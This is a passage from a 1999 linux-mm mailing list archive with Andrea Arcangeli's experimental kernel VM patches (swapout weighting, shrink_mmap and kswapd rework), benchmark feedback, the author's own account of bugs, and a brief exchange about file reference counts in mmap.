+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -162,8 +168,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +187,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +202,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +219,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -230,7 +239,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter, unsigned long * next_addr)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -256,13 +265,19 @@
 		if (result)
 			return result;
 		address += PAGE_SIZE;
+		if (!*counter)
+		{
+			*next_addr = address;
+			return 0;
+		} else
+			(*counter)--;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter, unsigned long * next_addr)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +297,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter, next_addr);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +309,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter, unsigned long * next_addr)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +323,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter, next_addr);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +354,16 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			unsigned long next_addr;
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter, &next_addr);
 			if (result)
 				return result;
+			if (!*counter)
+			{
+				p->swap_address = next_addr;
+				return 0;
+			}
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +377,19 @@
 	return 0;
 }
 
+static unsigned long total_rss(void)
+{
+	unsigned long total_rss = 0;
+	struct task_struct * p;
+
+	read_lock(&tasklist_lock);
+	for (p = init_task.next_task; p != &init_task; p = p->next_task)
+		total_rss += p->mm->rss;
+	read_unlock(&tasklist_lock);
+
+	return total_rss;
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,7 +398,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long max_cnt, counter;
+
+	counter = total_rss() >> priority;
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -374,13 +417,8 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter > 0) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -413,8 +451,9 @@
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-			return 1;
+		retval = swap_out_process(pbest, gfp_mask, &counter);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -441,42 +480,63 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
+
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -524,6 +584,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -543,35 +604,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -594,7 +643,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -632,9 +682,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -643,7 +692,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }
Index: linux/fs/buffer.c
diff -u linux/fs/buffer.c:1.1.1.5 linux/fs/buffer.c:1.1.1.1.2.6
--- linux/fs/buffer.c:1.1.1.5	Fri Jan  1 19:10:20 1999
+++ linux/fs/buffer.c	Sat Jan  2 21:40:07 1999
@@ -1263,6 +1263,7 @@
 		panic("brw_page: page not locked for I/O");
 	clear_bit(PG_uptodate, &page->flags);
 	clear_bit(PG_error, &page->flags);
+	set_bit(PG_referenced, &page->flags);
 	/*
 	 * Allocate async buffer heads pointing to this page, just for I/O.
 	 * They do _not_ show up in the buffer hash table!


Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 31%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02 20:52 31%               ` Andrea Arcangeli
@ 1999-01-03  2:59 32%                 ` Andrea Arcangeli
  1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
  1999-01-05 13:33 62%                   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Ben McCann
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-03  2:59 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Linus Torvalds, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Sat, 2 Jan 1999, Andrea Arcangeli wrote:

> is the swapout smart weight code. Basing the priority on the number of
> process to try to swapout was really ugly and not smart. 

But I done two mistakes in it. Benjamin pointed out after one msec that
there was no need for putting the address on the stack, and looking a
_bit_ more at swap_out_pmd() I noticed that the old code was just updating
swap_address, woops ;).

I noticed the second very more important mistakes running at 8Mbyte
because the trashing memory proggy was segfaulting. The bug was to base
the maximal weight of swap_out() on the total_rss and not on the sum of
the total_vm of all processes. With 8Mbyte all my processes got swapped
out and so swap_out stopped working ;). It's fixed now...

> The second change is done over shrink_mmap(), this will cause
> shrink_mmap() to care very more about aging. We have only one bit and we
> must use it carefully to get not out of cache ;) 

This change is pretty buggy too. The only good thing was to not care
about the pgcache min limits before to shrink the _swap_cache_. Now I also
changed pgcache_under_min to don't care about the swapcache size (now the
swap cache is a bit more fast-variable/crazy).

> I also added/removed some PG_referenced. But please, don't trust too much
> the pg_refernced changes since I have not thought about it too much (maybe
> they are not needed?). 

Hmm I guess at least the brw_page set_bit was not needed because before to
run such function is been run or a __find_page() or an add_to_...cache().

> Ah and woops, in the last patch I do a mistake and I forget to change
> max_cnt to unsigned long. This should be changed also in your tree, Linus. 

Also some count should be moved from int to unsigned long to handle huge
RAM sizes.

> This new patch seems to really rocks here and seems _far_ better than
> anything I tried before! Steve, could try it and feedback? Thanks ;) 

Here Steve's feedback:

                      128MB       8MB
                      -------     -------
Your previous patch:  132 sec     218 sec
This patch         :  118 sec     226 sec       

Even if `This patch' was pretty buggy (as pointed out above) it was going
sligtly _faster_. I guess the reason for the 8Mbyte slowdown was the
s/rss/total_vm/ thing (but I am not 100% sure). 

I fixed the bugs and so I repost the fixed diff against pre4. I also
cleaned up a bit some thing...

Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.12
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Sun Jan  3 03:43:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
@@ -379,8 +377,8 @@
 
 #define buffer_under_min()	((buffermem >> PAGE_SHIFT) * 100 < \
 				buffer_mem.min_percent * num_physpages)
-#define pgcache_under_min()	(page_cache_size * 100 < \
-				page_cache.min_percent * num_physpages)
+#define pgcache_under_min()	((page_cache_size-swapper_inode.i_nrpages)*100\
+				< page_cache.min_percent * num_physpages)
 
 #endif /* __KERNEL__ */
 
Index: linux/include/linux/pagemap.h
diff -u linux/include/linux/pagemap.h:1.1.1.1 linux/include/linux/pagemap.h:1.1.1.1.2.1
--- linux/include/linux/pagemap.h:1.1.1.1	Fri Nov 20 00:01:16 1998
+++ linux/include/linux/pagemap.h	Sat Jan  2 21:40:13 1999
@@ -77,6 +77,7 @@
 		*page->pprev_hash = page->next_hash;
 		page->pprev_hash = NULL;
 	}
+	clear_bit(PG_referenced, &page->flags);
 	page_cache_size--;
 }
 
Index: linux/mm/filemap.c
diff -u linux/mm/filemap.c:1.1.1.8 linux/mm/filemap.c:1.1.1.1.2.36
--- linux/mm/filemap.c:1.1.1.8	Fri Jan  1 19:12:53 1999
+++ linux/mm/filemap.c	Sun Jan  3 03:13:09 1999
@@ -122,13 +126,14 @@
 {
 	static unsigned long clock = 0;
 	unsigned long limit = num_physpages;
+	unsigned long count;
 	struct page * page;
-	int count;
 
 	count = limit >> priority;
 
 	page = mem_map + clock;
-	do {
+	while (count != 0)
+	{
 		page++;
 		clock++;
 		if (clock >= max_mapnr) {
@@ -167,17 +172,17 @@
 
 		/* is it a swap-cache or page-cache page? */
 		if (page->inode) {
-			if (pgcache_under_min())
-				continue;
 			if (PageSwapCache(page)) {
 				delete_from_swap_cache(page);
 				return 1;
 			}
+			if (pgcache_under_min())
+				continue;
 			remove_inode_page(page);
 			return 1;
 		}
 
-	} while (count > 0);
+	}
 	return 0;
 }
 
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.59
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Sun Jan  3 03:43:54 1999
@@ -10,6 +10,12 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm (do_free_user_and_cache), and
+ * developed a smart mechanism to handle the swapout weight.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -163,7 +169,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +201,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +216,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +235,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +256,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +289,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +301,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +315,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +346,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +365,19 @@
 	return 0;
 }
 
+static unsigned long get_total_vm(void)
+{
+	unsigned long total_vm = 0;
+	struct task_struct * p;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+		total_vm += p->mm->total_vm;
+	read_unlock(&tasklist_lock);
+
+	return total_vm;
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,8 +386,11 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
 
+	counter = get_total_vm() >> priority;
+
 	/* 
 	 * We make one or two passes through the task list, indexed by 
 	 * assign = {0, 1}:
@@ -374,20 +405,14 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter > 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
 	 		if (p->mm->rss <= 0)
@@ -410,10 +435,11 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
@@ -441,42 +467,63 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
+
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -524,6 +571,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -543,35 +591,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -594,7 +630,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -632,9 +669,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -643,7 +679,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }



As usual if you Steve or other will try this I am interested about numbers
;). Thanks.

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 32%]

* Bug in the mmap code?
@ 1999-01-03 22:00 64% Eric W. Biederman
  1999-01-03 22:36 64% ` Eric W. Biederman
  0 siblings, 1 reply; 200+ results
From: Eric W. Biederman @ 1999-01-03 22:00 UTC (permalink / raw)
  To: linux-mm


I have just been looking through the mmap code, 
with emphases on generic_file_mmap.

What I have discovered is that generic_file_mmap increases file->f_count
but nothing decreases said count.

file->f_count is also increased if a vma is split in half, by an unmap 
operation by the generic code.

Should the generic code handle this or should we leave all of that
work to the open and close methods?

Eric


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: Bug in the mmap code?
  1999-01-03 22:00 64% Bug in the mmap code? Eric W. Biederman
@ 1999-01-03 22:36 64% ` Eric W. Biederman
  0 siblings, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-01-03 22:36 UTC (permalink / raw)
  To: linux-mm


Dah.  We are calling fput everywhere in the generic code just fine.


Eric
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-03  2:59 32%                 ` Andrea Arcangeli
@ 1999-01-04 18:08 28%                   ` Andrea Arcangeli
  1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-05 13:33 62%                   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Ben McCann
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-04 18:08 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Linus Torvalds, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

I have a new revolutionary patch. The main thing is that I killed kswapd
just to make Rik happy ;).

Ah and my last patches had a little bug that was sure hurting performances
against Linus's VM since I was stopping kswapd when nr_free_pages >
freepages.high was true and not as right Linus was doing when
nr_free_pages > freepages.high + swap_cluster. So I was causing a lot of
kswapd wakeup.

There was also a not improved thing in the trashing_memory heuristic, that
is to remove the trashing bit only if PF_MEMALLOC is not set.

Ah and the swapout code seems to like a linear and not exponential
priority handling. Probably it likes more to succeed than shrink_mmap().

If you'll try it let me know. I am interested about the image load test
(that should be the most near to the real world). 

With this patch the swapout performances are doubled. The swapout
benchmark that was used to take 100 sec with my old code and with Linus's
VM, now run in 50sec! Now I go to 6Mbyte at sec (3so and 3si) instead of
3Mbyte sec (1.5so, 1.5si). 6mbyte/sec is the performance reported by
hdparm -t btw ;). And all the system is perfectly fluid (far more fuild
than with the old code). I open an xterm without wait seconds. The cache
get not kiked out. It seems really great here. When the system goes OOM it
seems to recover fine.

Here arca-vm-6 against 2.2.0-pre4:

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.62
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Mon Jan  4 18:42:54 1999
@@ -10,6 +10,12 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm (do_free_user_and_cache), and
+ * developed a smart mechanism to handle the swapout weight. Removed kswapd.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -20,13 +26,6 @@
 
 #include <asm/pgtable.h>
 
-/* 
